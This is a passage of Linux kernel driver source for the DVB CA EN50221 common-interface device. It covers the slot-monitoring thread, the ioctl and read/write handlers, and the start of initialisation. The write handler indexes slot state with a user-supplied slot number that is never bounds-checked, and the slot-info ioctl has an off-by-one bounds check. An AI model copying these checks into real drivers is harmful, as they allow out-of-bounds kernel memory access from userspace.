*\n * @ca: CA instance.\n * @slot: Slot concerned.\n */\nvoid dvb_ca_en50221_frda_irq(struct dvb_ca_en50221 *pubca, int slot)\n{\n\tstruct dvb_ca_private *ca = pubca->private;\n\tint flags;\n\n\tdprintk(\"FR/DA IRQ slot:%i\\n\", slot);\n\n\tswitch (ca->slot_info[slot].slot_state) {\n\tcase DVB_CA_SLOTSTATE_LINKINIT:\n\t\tflags = ca->pub->read_cam_control(pubca, slot, CTRLIF_STATUS);\n\t\tif (flags & STATUSREG_DA) {\n\t\t\tdprintk(\"CAM supports DA IRQ\\n\");\n\t\t\tca->slot_info[slot].da_irq_supported = 1;\n\t\t}\n\t\tbreak;\n\n\tcase DVB_CA_SLOTSTATE_RUNNING:\n\t\tif (ca->open)\n\t\t\tdvb_ca_en50221_thread_wakeup(ca);\n\t\tbreak;\n\t}\n}\n\n\n\n/* ******************************************************************************** */\n/* EN50221 thread functions */\n\n/**\n * Wake up the DVB CA thread\n *\n * @ca: CA instance.\n */\nstatic void dvb_ca_en50221_thread_wakeup(struct dvb_ca_private *ca)\n{\n\n\tdprintk(\"%s\\n\", __func__);\n\n\tca->wakeup = 1;\n\tmb();\n\twake_up_process(ca->thread);\n}\n\n/**\n * Update the delay used by the thread.\n *\n * @ca: CA instance.\n */\nstatic void dvb_ca_en50221_thread_update_delay(struct dvb_ca_private *ca)\n{\n\tint delay;\n\tint curdelay = 100000000;\n\tint slot;\n\n\t/* Beware of too high polling frequency, because one polling\n\t * call might take several hundred milliseconds until timeout!\n\t */\n\tfor (slot = 0; slot < ca->slot_count; slot++) {\n\t\tswitch (ca->slot_info[slot].slot_state) {\n\t\tdefault:\n\t\tcase DVB_CA_SLOTSTATE_NONE:\n\t\t\tdelay = HZ * 60; /* 60s */\n\t\t\tif (!(ca->flags & DVB_CA_EN50221_FLAG_IRQ_CAMCHANGE))\n\t\t\t\tdelay = HZ * 5; /* 5s */\n\t\t\tbreak;\n\t\tcase DVB_CA_SLOTSTATE_INVALID:\n\t\t\tdelay = HZ * 60; /* 60s */\n\t\t\tif (!(ca->flags & DVB_CA_EN50221_FLAG_IRQ_CAMCHANGE))\n\t\t\t\tdelay = HZ / 10; /* 100ms */\n\t\t\tbreak;\n\n\t\tcase DVB_CA_SLOTSTATE_UNINITIALISED:\n\t\tcase DVB_CA_SLOTSTATE_WAITREADY:\n\t\tcase DVB_CA_SLOTSTATE_VALIDATE:\n\t\tcase DVB_CA_SLOTSTATE_WAITFR:\n\t\tcase DVB_CA_SLOTSTATE_LINKINIT:\n\t\t\tdelay = HZ / 10; /* 100ms */\n\t\t\tbreak;\n\n\t\tcase DVB_CA_SLOTSTATE_RUNNING:\n\t\t\tdelay = HZ * 60; /* 60s */\n\t\t\tif (!(ca->flags & DVB_CA_EN50221_FLAG_IRQ_CAMCHANGE))\n\t\t\t\tdelay = HZ / 10; /* 100ms */\n\t\t\tif (ca->open) {\n\t\t\t\tif ((!ca->slot_info[slot].da_irq_supported) ||\n\t\t\t\t (!(ca->flags & DVB_CA_EN50221_FLAG_IRQ_DA)))\n\t\t\t\t\tdelay = HZ / 10; /* 100ms */\n\t\t\t}\n\t\t\tbreak;\n\t\t}\n\n\t\tif (delay < curdelay)\n\t\t\tcurdelay = delay;\n\t}\n\n\tca->delay = curdelay;\n}\n\n\n\n/**\n * Kernel thread which monitors CA slots for CAM changes, and performs data transfers.\n */\nstatic int dvb_ca_en50221_thread(void *data)\n{\n\tstruct dvb_ca_private *ca = data;\n\tint slot;\n\tint flags;\n\tint status;\n\tint pktcount;\n\tvoid *rxbuf;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\t/* choose the correct initial delay */\n\tdvb_ca_en50221_thread_update_delay(ca);\n\n\t/* main loop */\n\twhile (!kthread_should_stop()) {\n\t\t/* sleep for a bit */\n\t\tif (!ca->wakeup) {\n\t\t\tset_current_state(TASK_INTERRUPTIBLE);\n\t\t\tschedule_timeout(ca->delay);\n\t\t\tif (kthread_should_stop())\n\t\t\t\treturn 0;\n\t\t}\n\t\tca->wakeup = 0;\n\n\t\t/* go through all the slots processing them */\n\t\tfor (slot = 0; slot < ca->slot_count; slot++) {\n\n\t\t\tmutex_lock(&ca->slot_info[slot].slot_lock);\n\n\t\t\t// check the cam status + deal with CAMCHANGEs\n\t\t\twhile (dvb_ca_en50221_check_camstatus(ca, slot)) {\n\t\t\t\t/* clear down an old CI slot if necessary */\n\t\t\t\tif 
(ca->slot_info[slot].slot_state != DVB_CA_SLOTSTATE_NONE)\n\t\t\t\t\tdvb_ca_en50221_slot_shutdown(ca, slot);\n\n\t\t\t\t/* if a CAM is NOW present, initialise it */\n\t\t\t\tif (ca->slot_info[slot].camchange_type == DVB_CA_EN50221_CAMCHANGE_INSERTED) {\n\t\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_UNINITIALISED;\n\t\t\t\t}\n\n\t\t\t\t/* we've handled one CAMCHANGE */\n\t\t\t\tdvb_ca_en50221_thread_update_delay(ca);\n\t\t\t\tatomic_dec(&ca->slot_info[slot].camchange_count);\n\t\t\t}\n\n\t\t\t// CAM state machine\n\t\t\tswitch (ca->slot_info[slot].slot_state) {\n\t\t\tcase DVB_CA_SLOTSTATE_NONE:\n\t\t\tcase DVB_CA_SLOTSTATE_INVALID:\n\t\t\t\t// no action needed\n\t\t\t\tbreak;\n\n\t\t\tcase DVB_CA_SLOTSTATE_UNINITIALISED:\n\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_WAITREADY;\n\t\t\t\tca->pub->slot_reset(ca->pub, slot);\n\t\t\t\tca->slot_info[slot].timeout = jiffies + (INIT_TIMEOUT_SECS * HZ);\n\t\t\t\tbreak;\n\n\t\t\tcase DVB_CA_SLOTSTATE_WAITREADY:\n\t\t\t\tif (time_after(jiffies, ca->slot_info[slot].timeout)) {\n\t\t\t\t\tprintk(\"dvb_ca adaptor %d: PC card did not respond :(\\n\",\n\t\t\t\t\t ca->dvbdev->adapter->num);\n\t\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_INVALID;\n\t\t\t\t\tdvb_ca_en50221_thread_update_delay(ca);\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\t// no other action needed; will automatically change state when ready\n\t\t\t\tbreak;\n\n\t\t\tcase DVB_CA_SLOTSTATE_VALIDATE:\n\t\t\t\tif (dvb_ca_en50221_parse_attributes(ca, slot) != 0) {\n\t\t\t\t\t/* we need this extra check for annoying interfaces like the budget-av */\n\t\t\t\t\tif ((!(ca->flags & DVB_CA_EN50221_FLAG_IRQ_CAMCHANGE)) &&\n\t\t\t\t\t (ca->pub->poll_slot_status)) {\n\t\t\t\t\t\tstatus = ca->pub->poll_slot_status(ca->pub, slot, 0);\n\t\t\t\t\t\tif (!(status & DVB_CA_EN50221_POLL_CAM_PRESENT)) {\n\t\t\t\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_NONE;\n\t\t\t\t\t\t\tdvb_ca_en50221_thread_update_delay(ca);\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\n\t\t\t\t\tprintk(\"dvb_ca adapter %d: Invalid PC card inserted :(\\n\",\n\t\t\t\t\t ca->dvbdev->adapter->num);\n\t\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_INVALID;\n\t\t\t\t\tdvb_ca_en50221_thread_update_delay(ca);\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\tif (dvb_ca_en50221_set_configoption(ca, slot) != 0) {\n\t\t\t\t\tprintk(\"dvb_ca adapter %d: Unable to initialise CAM :(\\n\",\n\t\t\t\t\t ca->dvbdev->adapter->num);\n\t\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_INVALID;\n\t\t\t\t\tdvb_ca_en50221_thread_update_delay(ca);\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\tif (ca->pub->write_cam_control(ca->pub, slot,\n\t\t\t\t\t\t\t CTRLIF_COMMAND, CMDREG_RS) != 0) {\n\t\t\t\t\tprintk(\"dvb_ca adapter %d: Unable to reset CAM IF\\n\",\n\t\t\t\t\t ca->dvbdev->adapter->num);\n\t\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_INVALID;\n\t\t\t\t\tdvb_ca_en50221_thread_update_delay(ca);\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\tdprintk(\"DVB CAM validated successfully\\n\");\n\n\t\t\t\tca->slot_info[slot].timeout = jiffies + (INIT_TIMEOUT_SECS * HZ);\n\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_WAITFR;\n\t\t\t\tca->wakeup = 1;\n\t\t\t\tbreak;\n\n\t\t\tcase DVB_CA_SLOTSTATE_WAITFR:\n\t\t\t\tif (time_after(jiffies, ca->slot_info[slot].timeout)) {\n\t\t\t\t\tprintk(\"dvb_ca adapter %d: DVB CAM did not respond :(\\n\",\n\t\t\t\t\t ca->dvbdev->adapter->num);\n\t\t\t\t\tca->slot_info[slot].slot_state = 
DVB_CA_SLOTSTATE_INVALID;\n\t\t\t\t\tdvb_ca_en50221_thread_update_delay(ca);\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\n\t\t\t\tflags = ca->pub->read_cam_control(ca->pub, slot, CTRLIF_STATUS);\n\t\t\t\tif (flags & STATUSREG_FR) {\n\t\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_LINKINIT;\n\t\t\t\t\tca->wakeup = 1;\n\t\t\t\t}\n\t\t\t\tbreak;\n\n\t\t\tcase DVB_CA_SLOTSTATE_LINKINIT:\n\t\t\t\tif (dvb_ca_en50221_link_init(ca, slot) != 0) {\n\t\t\t\t\t/* we need this extra check for annoying interfaces like the budget-av */\n\t\t\t\t\tif ((!(ca->flags & DVB_CA_EN50221_FLAG_IRQ_CAMCHANGE)) &&\n\t\t\t\t\t (ca->pub->poll_slot_status)) {\n\t\t\t\t\t\tstatus = ca->pub->poll_slot_status(ca->pub, slot, 0);\n\t\t\t\t\t\tif (!(status & DVB_CA_EN50221_POLL_CAM_PRESENT)) {\n\t\t\t\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_NONE;\n\t\t\t\t\t\t\tdvb_ca_en50221_thread_update_delay(ca);\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\n\t\t\t\t\tprintk(\"dvb_ca adapter %d: DVB CAM link initialisation failed :(\\n\", ca->dvbdev->adapter->num);\n\t\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_INVALID;\n\t\t\t\t\tdvb_ca_en50221_thread_update_delay(ca);\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\n\t\t\t\tif (ca->slot_info[slot].rx_buffer.data == NULL) {\n\t\t\t\t\trxbuf = vmalloc(RX_BUFFER_SIZE);\n\t\t\t\t\tif (rxbuf == NULL) {\n\t\t\t\t\t\tprintk(\"dvb_ca adapter %d: Unable to allocate CAM rx buffer :(\\n\", ca->dvbdev->adapter->num);\n\t\t\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_INVALID;\n\t\t\t\t\t\tdvb_ca_en50221_thread_update_delay(ca);\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t\tdvb_ringbuffer_init(&ca->slot_info[slot].rx_buffer, rxbuf, RX_BUFFER_SIZE);\n\t\t\t\t}\n\n\t\t\t\tca->pub->slot_ts_enable(ca->pub, slot);\n\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_RUNNING;\n\t\t\t\tdvb_ca_en50221_thread_update_delay(ca);\n\t\t\t\tprintk(\"dvb_ca adapter %d: DVB CAM detected and initialised successfully\\n\", ca->dvbdev->adapter->num);\n\t\t\t\tbreak;\n\n\t\t\tcase DVB_CA_SLOTSTATE_RUNNING:\n\t\t\t\tif (!ca->open)\n\t\t\t\t\tbreak;\n\n\t\t\t\t// poll slots for data\n\t\t\t\tpktcount = 0;\n\t\t\t\twhile ((status = dvb_ca_en50221_read_data(ca, slot, NULL, 0)) > 0) {\n\t\t\t\t\tif (!ca->open)\n\t\t\t\t\t\tbreak;\n\n\t\t\t\t\t/* if a CAMCHANGE occurred at some point, do not do any more processing of this slot */\n\t\t\t\t\tif (dvb_ca_en50221_check_camstatus(ca, slot)) {\n\t\t\t\t\t\t// we dont want to sleep on the next iteration so we can handle the cam change\n\t\t\t\t\t\tca->wakeup = 1;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\n\t\t\t\t\t/* check if we've hit our limit this time */\n\t\t\t\t\tif (++pktcount >= MAX_RX_PACKETS_PER_ITERATION) {\n\t\t\t\t\t\t// dont sleep; there is likely to be more data to read\n\t\t\t\t\t\tca->wakeup = 1;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\t}\n\n\t\t\tmutex_unlock(&ca->slot_info[slot].slot_lock);\n\t\t}\n\t}\n\n\treturn 0;\n}\n\n\n\n/* ******************************************************************************** */\n/* EN50221 IO interface functions */\n\n/**\n * Real ioctl implementation.\n * NOTE: CA_SEND_MSG/CA_GET_MSG ioctls have userspace buffers passed to them.\n *\n * @inode: Inode concerned.\n * @file: File concerned.\n * @cmd: IOCTL command.\n * @arg: Associated argument.\n *\n * @return 0 on success, <0 on error.\n */\nstatic int dvb_ca_en50221_io_do_ioctl(struct file *file,\n\t\t\t\t unsigned int cmd, void *parg)\n{\n\tstruct dvb_device *dvbdev = file->private_data;\n\tstruct dvb_ca_private *ca = 
dvbdev->priv;\n\tint err = 0;\n\tint slot;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\tif (mutex_lock_interruptible(&ca->ioctl_mutex))\n\t\treturn -ERESTARTSYS;\n\n\tswitch (cmd) {\n\tcase CA_RESET:\n\t\tfor (slot = 0; slot < ca->slot_count; slot++) {\n\t\t\tmutex_lock(&ca->slot_info[slot].slot_lock);\n\t\t\tif (ca->slot_info[slot].slot_state != DVB_CA_SLOTSTATE_NONE) {\n\t\t\t\tdvb_ca_en50221_slot_shutdown(ca, slot);\n\t\t\t\tif (ca->flags & DVB_CA_EN50221_FLAG_IRQ_CAMCHANGE)\n\t\t\t\t\tdvb_ca_en50221_camchange_irq(ca->pub,\n\t\t\t\t\t\t\t\t slot,\n\t\t\t\t\t\t\t\t DVB_CA_EN50221_CAMCHANGE_INSERTED);\n\t\t\t}\n\t\t\tmutex_unlock(&ca->slot_info[slot].slot_lock);\n\t\t}\n\t\tca->next_read_slot = 0;\n\t\tdvb_ca_en50221_thread_wakeup(ca);\n\t\tbreak;\n\n\tcase CA_GET_CAP: {\n\t\tstruct ca_caps *caps = parg;\n\n\t\tcaps->slot_num = ca->slot_count;\n\t\tcaps->slot_type = CA_CI_LINK;\n\t\tcaps->descr_num = 0;\n\t\tcaps->descr_type = 0;\n\t\tbreak;\n\t}\n\n\tcase CA_GET_SLOT_INFO: {\n\t\tstruct ca_slot_info *info = parg;\n\n\t\tif ((info->num > ca->slot_count) || (info->num < 0)) {\n\t\t\terr = -EINVAL;\n\t\t\tgoto out_unlock;\n\t\t}\n\n\t\tinfo->type = CA_CI_LINK;\n\t\tinfo->flags = 0;\n\t\tif ((ca->slot_info[info->num].slot_state != DVB_CA_SLOTSTATE_NONE)\n\t\t\t&& (ca->slot_info[info->num].slot_state != DVB_CA_SLOTSTATE_INVALID)) {\n\t\t\tinfo->flags = CA_CI_MODULE_PRESENT;\n\t\t}\n\t\tif (ca->slot_info[info->num].slot_state == DVB_CA_SLOTSTATE_RUNNING) {\n\t\t\tinfo->flags |= CA_CI_MODULE_READY;\n\t\t}\n\t\tbreak;\n\t}\n\n\tdefault:\n\t\terr = -EINVAL;\n\t\tbreak;\n\t}\n\nout_unlock:\n\tmutex_unlock(&ca->ioctl_mutex);\n\treturn err;\n}\n\n\n/**\n * Wrapper for ioctl implementation.\n *\n * @inode: Inode concerned.\n * @file: File concerned.\n * @cmd: IOCTL command.\n * @arg: Associated argument.\n *\n * @return 0 on success, <0 on error.\n */\nstatic long dvb_ca_en50221_io_ioctl(struct file *file,\n\t\t\t\t unsigned int cmd, unsigned long arg)\n{\n\treturn dvb_usercopy(file, cmd, arg, dvb_ca_en50221_io_do_ioctl);\n}\n\n\n/**\n * Implementation of write() syscall.\n *\n * @file: File structure.\n * @buf: Source buffer.\n * @count: Size of source buffer.\n * @ppos: Position in file (ignored).\n *\n * @return Number of bytes read, or <0 on error.\n */\nstatic ssize_t dvb_ca_en50221_io_write(struct file *file,\n\t\t\t\t const char __user * buf, size_t count, loff_t * ppos)\n{\n\tstruct dvb_device *dvbdev = file->private_data;\n\tstruct dvb_ca_private *ca = dvbdev->priv;\n\tu8 slot, connection_id;\n\tint status;\n\tu8 fragbuf[HOST_LINK_BUF_SIZE];\n\tint fragpos = 0;\n\tint fraglen;\n\tunsigned long timeout;\n\tint written;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\t/* Incoming packet has a 2 byte header. 
hdr[0] = slot_id, hdr[1] = connection_id */\n\tif (count < 2)\n\t\treturn -EINVAL;\n\n\t/* extract slot & connection id */\n\tif (copy_from_user(&slot, buf, 1))\n\t\treturn -EFAULT;\n\tif (copy_from_user(&connection_id, buf + 1, 1))\n\t\treturn -EFAULT;\n\tbuf += 2;\n\tcount -= 2;\n\n\t/* check if the slot is actually running */\n\tif (ca->slot_info[slot].slot_state != DVB_CA_SLOTSTATE_RUNNING)\n\t\treturn -EINVAL;\n\n\t/* fragment the packets & store in the buffer */\n\twhile (fragpos < count) {\n\t\tfraglen = ca->slot_info[slot].link_buf_size - 2;\n\t\tif (fraglen < 0)\n\t\t\tbreak;\n\t\tif (fraglen > HOST_LINK_BUF_SIZE - 2)\n\t\t\tfraglen = HOST_LINK_BUF_SIZE - 2;\n\t\tif ((count - fragpos) < fraglen)\n\t\t\tfraglen = count - fragpos;\n\n\t\tfragbuf[0] = connection_id;\n\t\tfragbuf[1] = ((fragpos + fraglen) < count) ? 0x80 : 0x00;\n\t\tstatus = copy_from_user(fragbuf + 2, buf + fragpos, fraglen);\n\t\tif (status) {\n\t\t\tstatus = -EFAULT;\n\t\t\tgoto exit;\n\t\t}\n\n\t\ttimeout = jiffies + HZ / 2;\n\t\twritten = 0;\n\t\twhile (!time_after(jiffies, timeout)) {\n\t\t\t/* check the CAM hasn't been removed/reset in the meantime */\n\t\t\tif (ca->slot_info[slot].slot_state != DVB_CA_SLOTSTATE_RUNNING) {\n\t\t\t\tstatus = -EIO;\n\t\t\t\tgoto exit;\n\t\t\t}\n\n\t\t\tmutex_lock(&ca->slot_info[slot].slot_lock);\n\t\t\tstatus = dvb_ca_en50221_write_data(ca, slot, fragbuf, fraglen + 2);\n\t\t\tmutex_unlock(&ca->slot_info[slot].slot_lock);\n\t\t\tif (status == (fraglen + 2)) {\n\t\t\t\twritten = 1;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\tif (status != -EAGAIN)\n\t\t\t\tgoto exit;\n\n\t\t\tmsleep(1);\n\t\t}\n\t\tif (!written) {\n\t\t\tstatus = -EIO;\n\t\t\tgoto exit;\n\t\t}\n\n\t\tfragpos += fraglen;\n\t}\n\tstatus = count + 2;\n\nexit:\n\treturn status;\n}\n\n\n/**\n * Condition for waking up in dvb_ca_en50221_io_read_condition\n */\nstatic int dvb_ca_en50221_io_read_condition(struct dvb_ca_private *ca,\n\t\t\t\t\t int *result, int *_slot)\n{\n\tint slot;\n\tint slot_count = 0;\n\tint idx;\n\tsize_t fraglen;\n\tint connection_id = -1;\n\tint found = 0;\n\tu8 hdr[2];\n\n\tslot = ca->next_read_slot;\n\twhile ((slot_count < ca->slot_count) && (!found)) {\n\t\tif (ca->slot_info[slot].slot_state != DVB_CA_SLOTSTATE_RUNNING)\n\t\t\tgoto nextslot;\n\n\t\tif (ca->slot_info[slot].rx_buffer.data == NULL) {\n\t\t\treturn 0;\n\t\t}\n\n\t\tidx = dvb_ringbuffer_pkt_next(&ca->slot_info[slot].rx_buffer, -1, &fraglen);\n\t\twhile (idx != -1) {\n\t\t\tdvb_ringbuffer_pkt_read(&ca->slot_info[slot].rx_buffer, idx, 0, hdr, 2);\n\t\t\tif (connection_id == -1)\n\t\t\t\tconnection_id = hdr[0];\n\t\t\tif ((hdr[0] == connection_id) && ((hdr[1] & 0x80) == 0)) {\n\t\t\t\t*_slot = slot;\n\t\t\t\tfound = 1;\n\t\t\t\tbreak;\n\t\t\t}\n\n\t\t\tidx = dvb_ringbuffer_pkt_next(&ca->slot_info[slot].rx_buffer, idx, &fraglen);\n\t\t}\n\nnextslot:\n\t\tslot = (slot + 1) % ca->slot_count;\n\t\tslot_count++;\n\t}\n\n\tca->next_read_slot = slot;\n\treturn found;\n}\n\n\n/**\n * Implementation of read() syscall.\n *\n * @file: File structure.\n * @buf: Destination buffer.\n * @count: Size of destination buffer.\n * @ppos: Position in file (ignored).\n *\n * @return Number of bytes read, or <0 on error.\n */\nstatic ssize_t dvb_ca_en50221_io_read(struct file *file, char __user * buf,\n\t\t\t\t size_t count, loff_t * ppos)\n{\n\tstruct dvb_device *dvbdev = file->private_data;\n\tstruct dvb_ca_private *ca = dvbdev->priv;\n\tint status;\n\tint result = 0;\n\tu8 hdr[2];\n\tint slot;\n\tint connection_id = -1;\n\tsize_t idx, idx2;\n\tint last_fragment = 
0;\n\tsize_t fraglen;\n\tint pktlen;\n\tint dispose = 0;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\t/* Outgoing packet has a 2 byte header. hdr[0] = slot_id, hdr[1] = connection_id */\n\tif (count < 2)\n\t\treturn -EINVAL;\n\n\t/* wait for some data */\n\tif ((status = dvb_ca_en50221_io_read_condition(ca, &result, &slot)) == 0) {\n\n\t\t/* if we're in nonblocking mode, exit immediately */\n\t\tif (file->f_flags & O_NONBLOCK)\n\t\t\treturn -EWOULDBLOCK;\n\n\t\t/* wait for some data */\n\t\tstatus = wait_event_interruptible(ca->wait_queue,\n\t\t\t\t\t\t dvb_ca_en50221_io_read_condition\n\t\t\t\t\t\t (ca, &result, &slot));\n\t}\n\tif ((status < 0) || (result < 0)) {\n\t\tif (result)\n\t\t\treturn result;\n\t\treturn status;\n\t}\n\n\tidx = dvb_ringbuffer_pkt_next(&ca->slot_info[slot].rx_buffer, -1, &fraglen);\n\tpktlen = 2;\n\tdo {\n\t\tif (idx == -1) {\n\t\t\tprintk(\"dvb_ca adapter %d: BUG: read packet ended before last_fragment encountered\\n\", ca->dvbdev->adapter->num);\n\t\t\tstatus = -EIO;\n\t\t\tgoto exit;\n\t\t}\n\n\t\tdvb_ringbuffer_pkt_read(&ca->slot_info[slot].rx_buffer, idx, 0, hdr, 2);\n\t\tif (connection_id == -1)\n\t\t\tconnection_id = hdr[0];\n\t\tif (hdr[0] == connection_id) {\n\t\t\tif (pktlen < count) {\n\t\t\t\tif ((pktlen + fraglen - 2) > count) {\n\t\t\t\t\tfraglen = count - pktlen;\n\t\t\t\t} else {\n\t\t\t\t\tfraglen -= 2;\n\t\t\t\t}\n\n\t\t\t\tif ((status = dvb_ringbuffer_pkt_read_user(&ca->slot_info[slot].rx_buffer, idx, 2,\n\t\t\t\t\t\t\t\t buf + pktlen, fraglen)) < 0) {\n\t\t\t\t\tgoto exit;\n\t\t\t\t}\n\t\t\t\tpktlen += fraglen;\n\t\t\t}\n\n\t\t\tif ((hdr[1] & 0x80) == 0)\n\t\t\t\tlast_fragment = 1;\n\t\t\tdispose = 1;\n\t\t}\n\n\t\tidx2 = dvb_ringbuffer_pkt_next(&ca->slot_info[slot].rx_buffer, idx, &fraglen);\n\t\tif (dispose)\n\t\t\tdvb_ringbuffer_pkt_dispose(&ca->slot_info[slot].rx_buffer, idx);\n\t\tidx = idx2;\n\t\tdispose = 0;\n\t} while (!last_fragment);\n\n\thdr[0] = slot;\n\thdr[1] = connection_id;\n\tstatus = copy_to_user(buf, hdr, 2);\n\tif (status) {\n\t\tstatus = -EFAULT;\n\t\tgoto exit;\n\t}\n\tstatus = pktlen;\n\nexit:\n\treturn status;\n}\n\n\n/**\n * Implementation of file open syscall.\n *\n * @inode: Inode concerned.\n * @file: File concerned.\n *\n * @return 0 on success, <0 on failure.\n */\nstatic int dvb_ca_en50221_io_open(struct inode *inode, struct file *file)\n{\n\tstruct dvb_device *dvbdev = file->private_data;\n\tstruct dvb_ca_private *ca = dvbdev->priv;\n\tint err;\n\tint i;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\tif (!try_module_get(ca->pub->owner))\n\t\treturn -EIO;\n\n\terr = dvb_generic_open(inode, file);\n\tif (err < 0) {\n\t\tmodule_put(ca->pub->owner);\n\t\treturn err;\n\t}\n\n\tfor (i = 0; i < ca->slot_count; i++) {\n\n\t\tif (ca->slot_info[i].slot_state == DVB_CA_SLOTSTATE_RUNNING) {\n\t\t\tif (ca->slot_info[i].rx_buffer.data != NULL) {\n\t\t\t\t/* it is safe to call this here without locks because\n\t\t\t\t * ca->open == 0. 
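(the CA kernel thread only fills the\n\t\t\t\t * rx_buffer while the device is open, see the\n\t\t\t\t * DVB_CA_SLOTSTATE_RUNNING case above). 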
Data is not read in this case */\n\t\t\t\tdvb_ringbuffer_flush(&ca->slot_info[i].rx_buffer);\n\t\t\t}\n\t\t}\n\t}\n\n\tca->open = 1;\n\tdvb_ca_en50221_thread_update_delay(ca);\n\tdvb_ca_en50221_thread_wakeup(ca);\n\n\treturn 0;\n}\n\n\n/**\n * Implementation of file close syscall.\n *\n * @inode: Inode concerned.\n * @file: File concerned.\n *\n * @return 0 on success, <0 on failure.\n */\nstatic int dvb_ca_en50221_io_release(struct inode *inode, struct file *file)\n{\n\tstruct dvb_device *dvbdev = file->private_data;\n\tstruct dvb_ca_private *ca = dvbdev->priv;\n\tint err;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\t/* mark the CA device as closed */\n\tca->open = 0;\n\tdvb_ca_en50221_thread_update_delay(ca);\n\n\terr = dvb_generic_release(inode, file);\n\n\tmodule_put(ca->pub->owner);\n\n\treturn err;\n}\n\n\n/**\n * Implementation of poll() syscall.\n *\n * @file: File concerned.\n * @wait: poll wait table.\n *\n * @return Standard poll mask.\n */\nstatic unsigned int dvb_ca_en50221_io_poll(struct file *file, poll_table * wait)\n{\n\tstruct dvb_device *dvbdev = file->private_data;\n\tstruct dvb_ca_private *ca = dvbdev->priv;\n\tunsigned int mask = 0;\n\tint slot;\n\tint result = 0;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\tif (dvb_ca_en50221_io_read_condition(ca, &result, &slot) == 1) {\n\t\tmask |= POLLIN;\n\t}\n\n\t/* if there is something, return now */\n\tif (mask)\n\t\treturn mask;\n\n\t/* wait for something to happen */\n\tpoll_wait(file, &ca->wait_queue, wait);\n\n\tif (dvb_ca_en50221_io_read_condition(ca, &result, &slot) == 1) {\n\t\tmask |= POLLIN;\n\t}\n\n\treturn mask;\n}\nEXPORT_SYMBOL(dvb_ca_en50221_init);\n\n\nstatic const struct file_operations dvb_ca_fops = {\n\t.owner = THIS_MODULE,\n\t.read = dvb_ca_en50221_io_read,\n\t.write = dvb_ca_en50221_io_write,\n\t.unlocked_ioctl = dvb_ca_en50221_io_ioctl,\n\t.open = dvb_ca_en50221_io_open,\n\t.release = dvb_ca_en50221_io_release,\n\t.poll = dvb_ca_en50221_io_poll,\n\t.llseek = noop_llseek,\n};\n\nstatic const struct dvb_device dvbdev_ca = {\n\t.priv = NULL,\n\t.users = 1,\n\t.readers = 1,\n\t.writers = 1,\n#if defined(CONFIG_MEDIA_CONTROLLER_DVB)\n\t.name = \"dvb-ca-en50221\",\n#endif\n\t.fops = &dvb_ca_fops,\n};\n\n/* ******************************************************************************** */\n/* Initialisation/shutdown functions */\n\n\n/**\n * Initialise a new DVB CA EN50221 interface device.\n *\n * @dvb_adapter: DVB adapter to attach the new CA device to.\n * @ca: The dvb_ca instance.\n * @flags: Flags describing the CA device (DVB_CA_FLAG_*).\n * @slot_count: Number of slots supported.\n *\n * @return 0 on success, nonzero on failure\n */\nint dvb_ca_en50221_init(struct dvb_adapter *dvb_adapter,\n\t\t\tstruct dvb_ca_en50221 *pubca, int flags, int slot_count)\n{\n\tint ret;\n\tstruct dvb_ca_private *ca = NULL;\n\tint i;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\tif (slot_count < 1)\n\t\treturn -EINVAL;\n\n\t/* initialise the system data */\n\tif ((ca = kzalloc(sizeof(struct dvb_ca_private), GFP_KERNEL)) == NULL) {\n\t\tret = -ENOMEM;\n\t\tgoto exit;\n\t}\n\tca->pub = pubca;\n\tca->flags = flags;\n\tca->slot_count = slot_count;\n\tif ((ca->slot_info = kcalloc(slot_count, sizeof(struct dvb_ca_slot), GFP_KERNEL)) == NULL) {\n\t\tret = -ENOMEM;\n\t\tgoto free_ca;\n\t}\n\tinit_waitqueue_head(&ca->wait_queue);\n\tca->open = 0;\n\tca->wakeup = 0;\n\tca->next_read_slot = 0;\n\tpubca->private = ca;\n\n\t/* register the DVB device */\n\tret = dvb_register_device(dvb_adapter, &ca->dvbdev, &dvbdev_ca, ca, DVB_DEVICE_CA);\n\tif 
